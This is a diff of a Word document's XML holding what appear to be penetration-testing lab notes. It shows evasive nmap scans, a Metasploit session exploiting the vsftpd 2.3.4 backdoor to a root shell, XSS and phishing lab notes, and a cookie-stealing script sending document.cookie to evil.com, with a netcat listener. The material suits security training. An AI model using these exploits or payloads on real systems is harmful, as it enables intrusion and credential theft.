+      </w:r>
+      <w:r>
+        <w:t>________________________________________</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>All:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve"># </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sSVC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -p- --source-port 53 --min-parallelism 10 --min-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>hostgroup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 10 --max-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>hostgroup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 20 --max-retries 2 --max-scan-delay 5 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>target_range</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">--min-parallelism 10  </w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>: 10 Parallel tasks</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>--max-retries 2</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>: Number of Retry Probing Ports</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>--max-scan-delay 5</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>: Delay between each scan</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>--min-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hostgroup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 10 --max-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hostgroup</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 20</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>: Scan min 10 and max 20 hosts at one time</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>_______________________________</w:t>
-      </w:r>
-      <w:r>
-        <w:t>________________________________________</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>All:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"># </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sN</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -g 53 -D RND:5 -p 21,22,80,111 --reason 192.168.56.101</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -sN -g 53 -D RND:5 -p 21,22,80,111 --reason 192.168.56.101</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5653,23 +3377,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">Metasploit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Exploit+Payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Metasploit Exploit+Payload:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5689,39 +3397,22 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Port 21 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vsftpd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &gt;</w:t>
+        <w:t>- Port 21 vsftpd -</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf &gt;</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -5731,17 +3422,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">search </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>vsftpd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>search vsftpd</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5815,94 +3497,44 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   exploit/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &gt; use exploit/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/ftp/vsftpd_234_backdoor</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; show options</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Module options (exploit/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/ftp/vsftpd_234_backdoor):</w:t>
+        <w:t xml:space="preserve">   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf &gt; use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf exploit(vsftpd_234_backdoor) &gt; show options</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Module options (exploit/unix/ftp/vsftpd_234_backdoor):</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -5956,21 +3588,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; set RHOST 192.168.127.154</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf exploit(vsftpd_234_backdoor) &gt; set RHOST 192.168.127.154</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5995,21 +3618,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; show payloads</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf exploit(vsftpd_234_backdoor) &gt; show payloads</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6067,23 +3681,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">/interact        normal  </w:t>
+        <w:t xml:space="preserve">   cmd/unix/interact        normal  </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">            </w:t>
@@ -6100,138 +3698,48 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; set payload </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/interact</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">payload =&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>/interact</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; show options</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Module options (exploit/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>unix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/ftp/vsftpd_234_backdoor):</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf exploit(vsftpd_234_backdoor) &gt; set payload cmd/unix/interact</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>payload =&gt; cmd/unix/interact</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf exploit(vsftpd_234_backdoor) &gt; show options</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Module options (exploit/unix/ftp/vsftpd_234_backdoor):</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6287,35 +3795,18 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>msf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> exploit(vsftpd_234_backdoor) &gt; exploit</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>[*] Banner: 220 (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>vsFTPd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 2.3.4)</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>msf exploit(vsftpd_234_backdoor) &gt; exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>[*] Banner: 220 (vsFTPd 2.3.4)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6331,15 +3822,7 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">[+] UID: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>uid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=0(root) gid=0(root)</w:t>
+        <w:t>[+] UID: uid=0(root) gid=0(root)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6364,15 +3847,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>W</w:t>
+        <w:t>&gt;W</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6388,7 +3863,6 @@
         </w:rPr>
         <w:t>ami</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6617,17 +4091,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>rXSS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>&gt; rXSS</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6667,21 +4132,12 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>rXSS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> lab:</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>rXSS lab:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6765,13 +4221,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">From: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>natasha</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>From: natasha</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -6828,15 +4279,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">- Credential Theft: Success! Upon submitting her credentials to the fake login page, Alice's username and password are now logged on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>natasha's</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Apache webserver!</w:t>
+        <w:t>- Credential Theft: Success! Upon submitting her credentials to the fake login page, Alice's username and password are now logged on natasha's Apache webserver!</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6862,17 +4305,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>sXSS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>&gt; sXSS</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -6906,15 +4340,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">+ When a user requests the data, the server delivers legit data mixed with the malicious script, making every application’s user a potential victim of this </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sXSS</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> attack.</w:t>
+        <w:t>+ When a user requests the data, the server delivers legit data mixed with the malicious script, making every application’s user a potential victim of this sXSS attack.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6982,151 +4408,37 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">var </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>document.createElement</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>("</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>img.src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">="https://evil.com" + "/cookie=" + </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>encodeURIComponent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>document.cookie</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>document.body.appendChild</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>);</w:t>
+        <w:t>var img = document.createElement("img");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>img.src="https://evil.com" + "/cookie=" + encodeURIComponent(document.cookie);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>document.body.appendChild(img);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7152,92 +4464,35 @@
           <w:bCs/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>lvkp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 80</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>img</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>="http://attacker'sIP/cookie=+++++++" /&gt;</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc -lvkp 80</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&lt;img src="http://attacker'sIP/cookie=+++++++" /&gt;</w:t>
       </w:r>
